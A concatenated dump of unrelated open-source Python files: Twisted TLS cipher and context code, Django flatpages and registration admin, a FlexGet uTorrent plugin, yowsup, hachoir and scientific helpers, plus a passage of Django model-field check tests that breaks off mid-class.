for c in acceptableCiphers.selectCiphers(
_expandCipherString(u'ALL', self.method, self._options)
)
)
if self._cipherString == u'':
raise ValueError(
'Supplied IAcceptableCiphers yielded no usable ciphers '
'on this platform.'
)
if trustRoot is None:
if self.verify:
trustRoot = OpenSSLCertificateAuthorities(caCerts)
else:
self.verify = True
self.requireCertificate = True
trustRoot = IOpenSSLTrustRoot(trustRoot)
self.trustRoot = trustRoot
def __getstate__(self):
d = self.__dict__.copy()
try:
del d['_context']
except KeyError:
pass
return d
def __setstate__(self, state):
self.__dict__ = state
def getContext(self):
"""
Return an L{OpenSSL.SSL.Context} object.
"""
if self._context is None:
self._context = self._makeContext()
return self._context
def _makeContext(self):
ctx = self._contextFactory(self.method)
ctx.set_options(self._options)
if self.certificate is not None and self.privateKey is not None:
ctx.use_certificate(self.certificate)
ctx.use_privatekey(self.privateKey)
for extraCert in self.extraCertChain:
ctx.add_extra_chain_cert(extraCert)
# Sanity check
ctx.check_privatekey()
verifyFlags = SSL.VERIFY_NONE
if self.verify:
verifyFlags = SSL.VERIFY_PEER
if self.requireCertificate:
verifyFlags |= SSL.VERIFY_FAIL_IF_NO_PEER_CERT
if self.verifyOnce:
verifyFlags |= SSL.VERIFY_CLIENT_ONCE
self.trustRoot._addCACertsToContext(ctx)
# It'd be nice if pyOpenSSL let us pass None here for this behavior (as
# the underlying OpenSSL API call allows NULL to be passed). It
# doesn't, so we'll supply a function which does the same thing.
def _verifyCallback(conn, cert, errno, depth, preverify_ok):
return preverify_ok
ctx.set_verify(verifyFlags, _verifyCallback)
if self.verifyDepth is not None:
ctx.set_verify_depth(self.verifyDepth)
if self.enableSessions:
name = "%s-%d" % (reflect.qual(self.__class__), _sessionCounter())
sessionName = md5(networkString(name)).hexdigest()
ctx.set_session_id(sessionName)
if self.dhParameters:
ctx.load_tmp_dh(self.dhParameters._dhFile.path)
ctx.set_cipher_list(nativeString(self._cipherString))
if self._ecCurve is not None:
try:
self._ecCurve.addECKeyToContext(ctx)
except BaseException:
pass # ECDHE support is best effort only.
return ctx
class _OpenSSLECCurve(FancyEqMixin, object):
"""
A private representation of an OpenSSL ECC curve.
"""
compareAttributes = ("snName", )
def __init__(self, snName):
"""
@param snName: The name of the curve as used by C{OBJ_sn2nid}.
@param snName: L{unicode}
@raises NotImplementedError: If ECC support is not available.
@raises ValueError: If C{snName} is not a supported curve.
"""
self.snName = nativeString(snName)
# As soon as pyOpenSSL supports ECDHE directly, attempt to use its
# APIs first. See #7033.
# If pyOpenSSL is based on cryptography.io (0.14+), we use its
# bindings directly to set the ECDHE curve.
try:
binding = self._getBinding()
self._lib = binding.lib
self._ffi = binding.ffi
self._nid = self._lib.OBJ_sn2nid(self.snName.encode('ascii'))
if self._nid == self._lib.NID_undef:
raise ValueError("Unknown ECC curve.")
except AttributeError:
raise NotImplementedError(
"This version of pyOpenSSL does not support ECC."
)
def _getBinding(self):
"""
Attempt to get cryptography's binding instance.
@raises NotImplementedError: If underlying pyOpenSSL is not based on
cryptography.
@return: cryptograpy bindings.
@rtype: C{cryptography.hazmat.bindings.openssl.Binding}
"""
try:
from OpenSSL._util import binding
return binding
except ImportError:
raise NotImplementedError(
"This version of pyOpenSSL does not support ECC."
)
def addECKeyToContext(self, context):
"""
Add an temporary EC key to C{context}.
@param context: The context to add a key to.
@type context: L{OpenSSL.SSL.Context}
"""
ecKey = self._lib.EC_KEY_new_by_curve_name(self._nid)
if ecKey == self._ffi.NULL:
raise EnvironmentError("EC key creation failed.")
self._lib.SSL_CTX_set_tmp_ecdh(context._context, ecKey)
self._lib.EC_KEY_free(ecKey)
@implementer(ICipher)
class OpenSSLCipher(FancyEqMixin, object):
"""
A representation of an OpenSSL cipher.
"""
compareAttributes = ('fullName',)
def __init__(self, fullName):
"""
@param fullName: The full name of the cipher. For example
C{u"ECDHE-RSA-AES256-GCM-SHA384"}.
@type fullName: L{unicode}
"""
self.fullName = fullName
def __repr__(self):
"""
A runnable representation of the cipher.
"""
return 'OpenSSLCipher({0!r})'.format(self.fullName)
def _expandCipherString(cipherString, method, options):
"""
Expand C{cipherString} according to C{method} and C{options} to a list
of explicit ciphers that are supported by the current platform.
@param cipherString: An OpenSSL cipher string to expand.
@type cipherString: L{unicode}
@param method: An OpenSSL method like C{SSL.TLSv1_METHOD} used for
determining the effective ciphers.
@param options: OpenSSL options like C{SSL.OP_NO_SSLv3} ORed together.
@type options: L{int}
@return: The effective list of explicit ciphers that results from the
arguments on the current platform.
@rtype: L{list} of L{ICipher}
"""
ctx = SSL.Context(method)
ctx.set_options(options)
try:
ctx.set_cipher_list(nativeString(cipherString))
except SSL.Error as e:
if e.args[0][0][2] == 'no cipher match':
return []
else:
raise
conn = SSL.Connection(ctx, None)
ciphers = conn.get_cipher_list()
if isinstance(ciphers[0], unicode):
return [OpenSSLCipher(cipher) for cipher in ciphers]
else:
return [OpenSSLCipher(cipher.decode('ascii')) for cipher in ciphers]
@implementer(IAcceptableCiphers)
class OpenSSLAcceptableCiphers(object):
"""
A representation of ciphers that are acceptable for TLS connections.
"""
def __init__(self, ciphers):
self._ciphers = ciphers
def selectCiphers(self, availableCiphers):
return [cipher
for cipher in self._ciphers
if cipher in availableCiphers]
@classmethod
def fromOpenSSLCipherString(cls, cipherString):
"""
Create a new instance using an OpenSSL cipher string.
@param cipherString: An OpenSSL cipher string that describes what
cipher suites are acceptable.
See the documentation of U{OpenSSL
<http://www.openssl.org/docs/apps/ciphers.html#CIPHER_STRINGS>} or
U{Apache
<http://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslciphersuite>}
for details.
@type cipherString: L{unicode}
@return: Instance representing C{cipherString}.
@rtype: L{twisted.internet.ssl.AcceptableCiphers}
"""
return cls(_expandCipherString(
nativeString(cipherString),
SSL.SSLv23_METHOD, SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3)
)
# A secure default.
# Sources for more information on TLS ciphers:
#
# - https://wiki.mozilla.org/Security/Server_Side_TLS
# - https://www.ssllabs.com/projects/best-practices/index.html
# - https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
#
# The general intent is:
# - Prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE),
# - prefer ECDHE over DHE for better performance,
# - prefer any AES-GCM over any AES-CBC for better performance and security,
# - use 3DES as fallback which is secure but slow,
# - disable NULL authentication, MD5 MACs and DSS for security reasons.
#
defaultCiphers = OpenSSLAcceptableCiphers.fromOpenSSLCipherString(
"ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:"
"DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS"
)
_defaultCurveName = u"prime256v1"
class OpenSSLDiffieHellmanParameters(object):
"""
A representation of key generation parameters that are required for
Diffie-Hellman key exchange.
"""
def __init__(self, parameters):
self._dhFile = parameters
@classmethod
def fromFile(cls, filePath):
"""
Load parameters from a file.
Such a file can be generated using the C{openssl} command line tool as
following:
C{openssl dhparam -out dh_param_1024.pem -2 1024}
Please refer to U{OpenSSL's C{dhparam} documentation
<http://www.openssl.org/docs/apps/dhparam.html>} for further details.
@param filePath: A file containing parameters for Diffie-Hellman key
exchange.
@type filePath: L{FilePath <twisted.python.filepath.FilePath>}
@return: A instance that loads its parameters from C{filePath}.
@rtype: L{DiffieHellmanParameters
<twisted.internet.ssl.DiffieHellmanParameters>}
"""
return cls(filePath)
| bsd-3-clause |
nathanaevitas/odoo | openerp/addons/event/wizard/__init__.py | 435 | 1067 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import event_confirm
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
govarguz/espressopp | src/main/_setup.py | 9 | 4037 | # Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# now load the fundamental modules
# load mpi4py (must be loaded before _espressopp)
import mpi4py.MPI as MPI
# load the ES++-C++ module
import _espressopp
# load PMI explicitly from espressopp
from espressopp import pmi
# define pmiimport
if pmi.isController :
def pmiimport(module):
pmi.exec_('import ' + module)
else:
def pmiimport(module):
pass
# set up logging
def _setupLogging():
import logging, os, math
logConfigFile="espressopp_log.conf"
if os.path.exists(logConfigFile) :
import logging.config
logging.config.fileConfig(logConfigFile)
log = logging.getLogger('root')
log.info('Reading log config file %s', logConfigFile)
else :
logging.basicConfig(
format = "%(process)d %(asctime)s %(name)s (%(filename)s::%(lineno)s,%(funcName)s) %(levelname)s: %(message)s")
log = logging.getLogger('root')
log.info('Did not find log config file %s, using basic configuration.', logConfigFile)
# This initialization routine will change existing and future loggers
# to make a connection with their Python logger and change their class
def __my_setLevel(self, level):
__orig_setLevel(self, level)
_espressopp.setLogger(self)
__orig_setLevel = logging.Logger.setLevel
logging.Logger.setLevel = __my_setLevel
logging.TRACE = int((logging.NOTSET + logging.DEBUG)/2.0)
logging.addLevelName('TRACE', logging.TRACE)
_espressopp.setLogger()
# execute the function
_setupLogging()
def _setupProperty():
import __builtin__
# Make the property setter decorator syntax of python 2.6+ available
# to earlier versions
try :
__setter = __builtin__.property.setter
except AttributeError :
import __builtin__, sys
# save the property builtin
_property = __builtin__.property
# now define our property
# stolen from http://bruynooghe.blogspot.com/2008/04/xsetter-syntax-in-python-25.html
class property(_property):
def __init__(self, fget, *args, **kwargs):
self.__doc__ = fget.__doc__
super(property, self).__init__(fget, *args, **kwargs)
def setter(self, fset):
cls_ns = sys._getframe(1).f_locals
for k, v in cls_ns.iteritems():
if v == self:
propname = k
break
cls_ns[propname] = _property(self.fget, fset,
self.fdel, self.__doc__)
return cls_ns[propname]
def deleter(self, fdel):
cls_ns = sys._getframe(1).f_locals
for k, v in cls_ns.iteritems():
if v == self:
propname = k
break
cls_ns[propname] = _property(self.fget, self.fset,
fdel, self.__doc__)
return cls_ns[propname]
# Now override the property builtin
__builtin__.property = property
_setupProperty()
| gpl-3.0 |
hosseinsadeghi/ultracold-ions | uci/AngularDampingAdvance.py | 2 | 3099 | # vi: ts=4 sw=4
import math
import numpy
import pyopencl.array as cl_array
import pyopencl as cl
import sys
import os
class AngularDampingAdvance():
def __init__(self, ctx = None, queue = None):
self.minRadius = 1.0e-5
self.ctx = ctx
self.queue = queue
if self.ctx == None:
self.ctx = cl.create_some_context()
if self.queue == None:
self.queue = cl.CommandQueue(self.ctx,
properties = cl.command_queue_properties.PROFILING_ENABLE)
absolutePathToKernels = os.path.dirname(
os.path.realpath(__file__))
src = open(absolutePathToKernels + '/angular_damping_advance.cl',
'r').read()
self.angularDampingAdvF = cl.Program(self.ctx, src)
try:
self.angularDampingAdvF.build()
except:
print("Error:")
print(self.angularDampingAdvF.get_build_info(
self.ctx.devices[0],
cl.program_build_info.LOG))
raise
self.angularDampingAdvF.advance_ptcls_angular_damping.set_scalar_arg_dtypes(
[None, None, None, None, None, None, None, None,
numpy.float32, numpy.float32, numpy.float32,
numpy.int32])
self.angularDampingAdvD = cl.Program(self.ctx, src)
try:
self.angularDampingAdvD.build()
except:
print("Error:")
print(self.angularDampingAdvD.get_build_info(
self.ctx.devices[0],
cl.program_build_info.LOG))
raise
self.angularDampingAdvD.advance_ptcls_angular_damping.set_scalar_arg_dtypes(
[None, None, None, None, None, None, None, None,
numpy.float64, numpy.float64, numpy.float64,
numpy.int32])
def advancePtcls(self, xd, yd, zd, vxd, vyd, vzd, qd, md,
dampingCoefficient, omega, dt):
"""
Dampen velocities in the x-y plane.
"""
prec = xd.dtype
if prec == numpy.float32:
self.angularDampingAdvD.advance_ptcls_angular_damping(self.queue,
(xd.size, ), None,
xd.data, yd.data, zd.data,
vxd.data, vyd.data, vzd.data,
qd.data, md.data,
numpy.float32(math.exp(-dampingCoefficient * dt)),
numpy.float32(omega),
numpy.float32(self.minRadius),
numpy.int32(xd.size),
g_times_l = False)
elif prec == numpy.float64:
self.angularDampingAdvD.advance_ptcls_angular_damping(self.queue,
(xd.size, ), None,
xd.data, yd.data, zd.data,
vxd.data, vyd.data, vzd.data,
qd.data, md.data,
numpy.float64(math.exp(-dampingCoefficient * dt)),
numpy.float64(omega),
numpy.float64(self.minRadius),
numpy.int32(xd.size),
g_times_l = False)
else:
print("Unknown float type.")
| mit |
chriscauley/django-registration | registration/admin.py | 1 | 1630 | from django.contrib import admin, messages
from django.contrib.sites.requests import RequestSite
from django.contrib.sites.models import Site
from django.utils.translation import ugettext_lazy as _
from registration.models import RegistrationProfile
class RawMixin(object):
def formfield_for_dbfield(self, db_field, **kwargs):
if db_field.name in self.raw_id_fields:
kwargs.pop("request", None)
type = db_field.rel.__class__.__name__
if type == "ManyToOneRel":
kwargs['widget'] = VerboseForeignKeyRawIdWidget(db_field.rel, site)
elif type == "ManyToManyRel":
kwargs['widget'] = VerboseManyToManyRawIdWidget(db_field.rel, site)
return db_field.formfield(**kwargs)
return super(RawMixin, self).formfield_for_dbfield(db_field, **kwargs)
class RegistrationAdmin(RawMixin,admin.ModelAdmin):
actions = ['activate_users', 'resend_activation_email']
list_display = ('user', 'expired')
raw_id_fields = ['user']
search_fields = ('user__username', 'user__first_name', 'user__last_name')
def activate_users(self, request, queryset):
for profile in queryset:
RegistrationProfile.objects.activate_user(profile.activation_key)
activate_users.short_description = _("Activate users")
def resend_activation_email(self, request, queryset):
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
for profile in queryset:
profile.send_activation_email(site)
resend_activation_email.short_description = _("Re-send activation emails")
admin.site.register(RegistrationProfile, RegistrationAdmin)
| bsd-3-clause |
joakim-hove/django | django/contrib/flatpages/views.py | 475 | 2777 | from django.conf import settings
from django.contrib.flatpages.models import FlatPage
from django.contrib.sites.shortcuts import get_current_site
from django.http import Http404, HttpResponse, HttpResponsePermanentRedirect
from django.shortcuts import get_object_or_404
from django.template import loader
from django.utils.safestring import mark_safe
from django.views.decorators.csrf import csrf_protect
DEFAULT_TEMPLATE = 'flatpages/default.html'
# This view is called from FlatpageFallbackMiddleware.process_response
# when a 404 is raised, which often means CsrfViewMiddleware.process_view
# has not been called even if CsrfViewMiddleware is installed. So we need
# to use @csrf_protect, in case the template needs {% csrf_token %}.
# However, we can't just wrap this view; if no matching flatpage exists,
# or a redirect is required for authentication, the 404 needs to be returned
# without any CSRF checks. Therefore, we only
# CSRF protect the internal implementation.
def flatpage(request, url):
"""
Public interface to the flat page view.
Models: `flatpages.flatpages`
Templates: Uses the template defined by the ``template_name`` field,
or :template:`flatpages/default.html` if template_name is not defined.
Context:
flatpage
`flatpages.flatpages` object
"""
if not url.startswith('/'):
url = '/' + url
site_id = get_current_site(request).id
try:
f = get_object_or_404(FlatPage,
url=url, sites=site_id)
except Http404:
if not url.endswith('/') and settings.APPEND_SLASH:
url += '/'
f = get_object_or_404(FlatPage,
url=url, sites=site_id)
return HttpResponsePermanentRedirect('%s/' % request.path)
else:
raise
return render_flatpage(request, f)
@csrf_protect
def render_flatpage(request, f):
"""
Internal interface to the flat page view.
"""
# If registration is required for accessing this page, and the user isn't
# logged in, redirect to the login page.
if f.registration_required and not request.user.is_authenticated():
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(request.path)
if f.template_name:
template = loader.select_template((f.template_name, DEFAULT_TEMPLATE))
else:
template = loader.get_template(DEFAULT_TEMPLATE)
# To avoid having to always use the "|safe" filter in flatpage templates,
# mark the title and content as already safe (since they are raw HTML
# content in the first place).
f.title = mark_safe(f.title)
f.content = mark_safe(f.content)
response = HttpResponse(template.render({'flatpage': f}, request))
return response
| bsd-3-clause |
SerialShadow/SickRage | lib/hachoir_core/field/basic_field_set.py | 74 | 4776 | from hachoir_core.field import Field, FieldError
from hachoir_core.stream import InputStream
from hachoir_core.endian import BIG_ENDIAN, LITTLE_ENDIAN, MIDDLE_ENDIAN
from hachoir_core.event_handler import EventHandler
class ParserError(FieldError):
"""
Error raised by a field set.
@see: L{FieldError}
"""
pass
class MatchError(FieldError):
"""
Error raised by a field set when the stream content doesn't
match to file format.
@see: L{FieldError}
"""
pass
class BasicFieldSet(Field):
_event_handler = None
is_field_set = True
endian = None
def __init__(self, parent, name, stream, description, size):
# Sanity checks (preconditions)
assert not parent or issubclass(parent.__class__, BasicFieldSet)
assert issubclass(stream.__class__, InputStream)
# Set field set size
if size is None and self.static_size:
assert isinstance(self.static_size, (int, long))
size = self.static_size
# Set Field attributes
self._parent = parent
self._name = name
self._size = size
self._description = description
self.stream = stream
self._field_array_count = {}
# Set endian
if not self.endian:
assert parent and parent.endian
self.endian = parent.endian
if parent:
# This field set is one of the root leafs
self._address = parent.nextFieldAddress()
self.root = parent.root
assert id(self.stream) == id(parent.stream)
else:
# This field set is the root
self._address = 0
self.root = self
self._global_event_handler = None
# Sanity checks (post-conditions)
assert self.endian in (BIG_ENDIAN, LITTLE_ENDIAN, MIDDLE_ENDIAN)
if (self._size is not None) and (self._size <= 0):
raise ParserError("Invalid parser '%s' size: %s" % (self.path, self._size))
def reset(self):
self._field_array_count = {}
def createValue(self):
return None
def connectEvent(self, event_name, handler, local=True):
assert event_name in (
# Callback prototype: def f(field)
# Called when new value is already set
"field-value-changed",
# Callback prototype: def f(field)
# Called when field size is already set
"field-resized",
# A new field has been inserted in the field set
# Callback prototype: def f(index, new_field)
"field-inserted",
# Callback prototype: def f(old_field, new_field)
# Called when new field is already in field set
"field-replaced",
# Callback prototype: def f(field, new_value)
# Called to ask to set new value
"set-field-value"
), "Event name %r is invalid" % event_name
if local:
if self._event_handler is None:
self._event_handler = EventHandler()
self._event_handler.connect(event_name, handler)
else:
if self.root._global_event_handler is None:
self.root._global_event_handler = EventHandler()
self.root._global_event_handler.connect(event_name, handler)
def raiseEvent(self, event_name, *args):
# Transfer event to local listeners
if self._event_handler is not None:
self._event_handler.raiseEvent(event_name, *args)
# Transfer event to global listeners
if self.root._global_event_handler is not None:
self.root._global_event_handler.raiseEvent(event_name, *args)
def setUniqueFieldName(self, field):
key = field._name[:-2]
try:
self._field_array_count[key] += 1
except KeyError:
self._field_array_count[key] = 0
field._name = key + "[%u]" % self._field_array_count[key]
def readFirstFields(self, number):
"""
Read first number fields if they are not read yet.
Returns number of new added fields.
"""
number = number - self.current_length
if 0 < number:
return self.readMoreFields(number)
else:
return 0
def createFields(self):
raise NotImplementedError()
def __iter__(self):
raise NotImplementedError()
def __len__(self):
raise NotImplementedError()
def getField(self, key, const=True):
raise NotImplementedError()
def nextFieldAddress(self):
raise NotImplementedError()
def getFieldIndex(self, field):
raise NotImplementedError()
def readMoreFields(self, number):
raise NotImplementedError()
| gpl-3.0 |
X-dark/Flexget | flexget/plugins/output/utorrent.py | 7 | 3914 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, absolute_import
import os
from logging import getLogger
from flexget import plugin
from flexget.event import event
from flexget.utils import requests
from flexget.utils.soup import get_soup
from flexget.utils.template import RenderError
log = getLogger('utorrent')
class PluginUtorrent(object):
"""
Parse task content or url for hoster links and adds them to utorrent.
Example::
utorrent:
url: http://localhost:8080/gui/
username: my_username
password: my_password
path: Series
"""
__author__ = 'Nil'
__version__ = '0.1'
schema = {
'type': 'object',
'properties': {
'url': {'type': 'string', 'format': 'url'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'path': {'type': 'string'}
},
'required': ['username', 'password', 'url'],
'additionalProperties': False
}
@plugin.internet(log)
def on_task_output(self, task, config):
if not config.get('enabled', True):
return
if not task.accepted:
return
session = requests.Session()
url = config['url']
if not url.endswith('/'):
url += '/'
auth = (config['username'], config['password'])
# Login
try:
response = session.get(url + 'token.html', auth=auth)
except requests.RequestException as e:
if hasattr(e, 'response') and e.response.status_code == '401':
raise plugin.PluginError('Invalid credentials, check your utorrent webui username and password.', log)
raise plugin.PluginError('%s' % e, log)
token = get_soup(response.text).find('div', id='token').text
result = session.get(url, auth=auth, params={'action': 'list-dirs', 'token': token}).json()
download_dirs = dict((os.path.normcase(dir['path']), i) for i, dir in enumerate(result['download-dirs']))
for entry in task.accepted:
# http://[IP]:[PORT]/gui/?action=add-url&s=[TORRENT URL]
# bunch of urls now going to check
folder = 0
path = entry.get('path', config.get('path', ''))
try:
path = os.path.normcase(os.path.expanduser(entry.render(path)))
except RenderError as e:
log.error('Could not render path for `%s` downloading to default directory.' % entry['title'])
# Add to default folder
path = ''
if path:
for dir in download_dirs:
if path.startswith(dir):
folder = download_dirs[dir]
path = path[len(dir):].lstrip('\\')
break
else:
log.error('path `%s` (or one of its parents)is not added to utorrent webui allowed download '
'directories. You must add it there before you can use it from flexget. '
'Adding to default download directory instead.' % path)
path = ''
if task.options.test:
log.info('Would add `%s` to utorrent' % entry['title'])
continue
# Add torrent
data = {'action': 'add-url', 's': entry['url'], 'token': token, 'download_dir': folder, 'path': path}
result = session.get(url, params=data, auth=auth)
if 'build' in result.json():
log.info('Added `%s` to utorrent' % entry['url'])
log.info('in folder %s ' % folder + path)
else:
entry.fail('Fail to add `%s` to utorrent' % entry['url'])
@event('plugin.register')
def register_plugin():
plugin.register(PluginUtorrent, 'utorrent', api_ver=2)
| mit |
saisrisathya/whatsapps | build/lib/yowsup/layers/protocol_profiles/layer.py | 31 | 2304 | from yowsup.layers import YowProtocolLayer
from .protocolentities import *
from yowsup.layers.protocol_iq.protocolentities import ErrorIqProtocolEntity, ResultIqProtocolEntity
class YowProfilesProtocolLayer(YowProtocolLayer):
def __init__(self):
handleMap = {
"iq": (self.recvIq, self.sendIq)
}
super(YowProfilesProtocolLayer, self).__init__(handleMap)
def __str__(self):
return "Profiles Layer"
def sendIq(self, entity):
if entity.getXmlns() == "w:profile:picture":
if entity.getType() == "get":
self._sendIq(entity, self.onGetPictureResult, self.onGetPictureError)
elif entity.getType() == "set":
self._sendIq(entity, self.onSetPictureResult, self.onSetPictureError)
elif entity.getType() == "delete":
self._sendIq(entity, self.onDeletePictureResult, self.onDeletePictureError)
elif entity.getXmlns() == "status":
self._sendIq(entity, self.onSetStatusResult, self.onSetStatusError)
def recvIq(self, node):
pass
def onSetStatusResult(self, resultNode, originIqRequestEntity):
self.toUpper(ResultIqProtocolEntity.fromProtocolTreeNode(resultNode))
def onSetStatusError(self, errorNode, originalIqRequestEntity):
self.toUpper(ErrorIqProtocolEntity.fromProtocolTreeNode(errorNode))
def onGetPictureResult(self, resultNode, originalIqRequestEntity):
self.toUpper(ResultGetPictureIqProtocolEntity.fromProtocolTreeNode(resultNode))
def onGetPictureError(self, errorNode, originalIqRequestEntity):
self.toUpper(ErrorIqProtocolEntity.fromProtocolTreeNode(errorNode))
def onSetPictureResult(self, resultNode, originalIqRequestEntity):
self.toUpper(ResultGetPictureIqProtocolEntity.fromProtocolTreeNode(resultNode))
def onSetPictureError(self, errorNode, originalIqRequestEntity):
self.toUpper(ErrorIqProtocolEntity.fromProtocolTreeNode(errorNode))
def onDeletePictureResult(self, resultNode, originalIqRequestEntity):
self.toUpper(ResultIqProtocolEntity.fromProtocolTreeNode(resultNode))
def onDeletePictureError(self, errorNode, originalIqRequestEntity):
self.toUpper(ErrorIqProtocolEntity.fromProtocolTreeNode(errorNode))
| gpl-3.0 |
mjtamlyn/django | tests/invalid_models_tests/test_relative_fields.py | 18 | 60736 | from django.core.checks import Error, Warning as DjangoWarning
from django.db import models
from django.db.models.fields.related import ForeignObject
from django.test.testcases import SimpleTestCase, skipIfDBFeature
from django.test.utils import isolate_apps, override_settings
@isolate_apps('invalid_models_tests')
class RelativeFieldTests(SimpleTestCase):
def test_valid_foreign_key_without_accessor(self):
class Target(models.Model):
# There would be a clash if Model.field installed an accessor.
model = models.IntegerField()
class Model(models.Model):
field = models.ForeignKey(Target, models.CASCADE, related_name='+')
field = Model._meta.get_field('field')
errors = field.check()
self.assertEqual(errors, [])
def test_foreign_key_to_missing_model(self):
# Model names are resolved when a model is being created, so we cannot
# test relative fields in isolation and we need to attach them to a
# model.
class Model(models.Model):
foreign_key = models.ForeignKey('Rel1', models.CASCADE)
field = Model._meta.get_field('foreign_key')
errors = field.check()
expected = [
Error(
"Field defines a relation with model 'Rel1', "
"which is either not installed, or is abstract.",
obj=field,
id='fields.E300',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
def test_foreign_key_to_isolate_apps_model(self):
"""
#25723 - Referenced model registration lookup should be run against the
field's model registry.
"""
class OtherModel(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('OtherModel', models.CASCADE)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(from_model=Model), [])
def test_many_to_many_to_missing_model(self):
class Model(models.Model):
m2m = models.ManyToManyField("Rel2")
field = Model._meta.get_field('m2m')
errors = field.check(from_model=Model)
expected = [
Error(
"Field defines a relation with model 'Rel2', "
"which is either not installed, or is abstract.",
obj=field,
id='fields.E300',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
def test_many_to_many_to_isolate_apps_model(self):
"""
#25723 - Referenced model registration lookup should be run against the
field's model registry.
"""
class OtherModel(models.Model):
pass
class Model(models.Model):
m2m = models.ManyToManyField('OtherModel')
field = Model._meta.get_field('m2m')
self.assertEqual(field.check(from_model=Model), [])
def test_many_to_many_with_limit_choices_auto_created_no_warning(self):
class Model(models.Model):
name = models.CharField(max_length=20)
class ModelM2M(models.Model):
m2m = models.ManyToManyField(Model, limit_choices_to={'name': 'test_name'})
self.assertEqual(ModelM2M.check(), [])
def test_many_to_many_with_useless_options(self):
class Model(models.Model):
name = models.CharField(max_length=20)
class ModelM2M(models.Model):
m2m = models.ManyToManyField(
Model,
null=True,
validators=[lambda x: x],
limit_choices_to={'name': 'test_name'},
through='ThroughModel',
through_fields=('modelm2m', 'model'),
)
class ThroughModel(models.Model):
model = models.ForeignKey('Model', models.CASCADE)
modelm2m = models.ForeignKey('ModelM2M', models.CASCADE)
errors = ModelM2M.check()
field = ModelM2M._meta.get_field('m2m')
expected = [
DjangoWarning(
'null has no effect on ManyToManyField.',
obj=field,
id='fields.W340',
),
DjangoWarning(
'ManyToManyField does not support validators.',
obj=field,
id='fields.W341',
),
DjangoWarning(
'limit_choices_to has no effect on ManyToManyField '
'with a through model.',
obj=field,
id='fields.W343',
),
]
self.assertEqual(errors, expected)
def test_ambiguous_relationship_model(self):
class Person(models.Model):
pass
class Group(models.Model):
field = models.ManyToManyField('Person', through="AmbiguousRelationship", related_name='tertiary')
class AmbiguousRelationship(models.Model):
# Too much foreign keys to Person.
first_person = models.ForeignKey(Person, models.CASCADE, related_name="first")
second_person = models.ForeignKey(Person, models.CASCADE, related_name="second")
second_model = models.ForeignKey(Group, models.CASCADE)
field = Group._meta.get_field('field')
errors = field.check(from_model=Group)
expected = [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.field', but it has more than one "
"foreign key to 'Person', which is ambiguous. You must specify "
"which foreign key Django should use via the through_fields "
"keyword argument.",
hint=(
'If you want to create a recursive relationship, use '
'ForeignKey("self", symmetrical=False, through="AmbiguousRelationship").'
),
obj=field,
id='fields.E335',
),
]
self.assertEqual(errors, expected)
def test_relationship_model_with_foreign_key_to_wrong_model(self):
class WrongModel(models.Model):
pass
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="InvalidRelationship")
class InvalidRelationship(models.Model):
person = models.ForeignKey(Person, models.CASCADE)
wrong_foreign_key = models.ForeignKey(WrongModel, models.CASCADE)
# The last foreign key should point to Group model.
field = Group._meta.get_field('members')
errors = field.check(from_model=Group)
expected = [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.members', but it does not "
"have a foreign key to 'Group' or 'Person'.",
obj=InvalidRelationship,
id='fields.E336',
),
]
self.assertEqual(errors, expected)
def test_relationship_model_missing_foreign_key(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="InvalidRelationship")
class InvalidRelationship(models.Model):
group = models.ForeignKey(Group, models.CASCADE)
# No foreign key to Person
field = Group._meta.get_field('members')
errors = field.check(from_model=Group)
expected = [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.members', but it does not have "
"a foreign key to 'Group' or 'Person'.",
obj=InvalidRelationship,
id='fields.E336',
),
]
self.assertEqual(errors, expected)
def test_missing_relationship_model(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="MissingM2MModel")
field = Group._meta.get_field('members')
errors = field.check(from_model=Group)
expected = [
Error(
"Field specifies a many-to-many relation through model "
"'MissingM2MModel', which has not been installed.",
obj=field,
id='fields.E331',
),
]
self.assertEqual(errors, expected)
def test_missing_relationship_model_on_model_check(self):
class Person(models.Model):
pass
class Group(models.Model):
